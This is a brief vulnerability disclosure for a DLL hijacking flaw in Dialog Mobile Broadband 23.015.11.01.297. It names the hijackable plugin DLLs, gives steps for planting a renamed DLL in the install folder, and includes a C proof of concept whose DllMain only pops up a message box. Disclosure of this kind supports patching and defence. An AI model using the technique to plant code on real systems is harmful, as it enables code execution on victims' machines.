Dialog Mobile Broadband version 23.015.11.01.297 suffers from a dll hijacking vulnerability.
d50ba80bd092d2bcf2040522c57ed047Vulnerable software .......................... Dialog Mobile Broadband 23.015.11.01.297
Vulnerability type .............................. DLL hijacking vulnerability
Affected DLL's.................................... CallSrvPlugin.dll , GpsSrvPlugin.dll , CallAppPlugin.dll , CallLogSrvPlugin.dll , WLANPlugin.dll , CallAppPlugin,MDInterface.dll
Vendor url .https://www.dialog.lk
Author..Himash
Product descriptionDialog mobile broad band is a dongle software (3g modem)for accessing internet.
It comes with dialog dongle pre installed.
1. Compile dynamic link library (DLL)
2. Rename to CallSrvPlugin.dll
2. Copy CallSrvPlugin to "C:\Program Files (x86)\Dialog Mobile Broadband"
3. Launch Dialog Mobile Broadband
4. MessageBox executes that verifies the dll hijacking is successful.
Proof of concept Exploit
#include <windows.h>
int dll_hijack()
{
MessageBox(0, "found DLL hijacking vulnerability in dialog mobile broadband by himash", "DLL Message", MB_OK);
return 0;
}
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
dll_hijack();
return 0;
}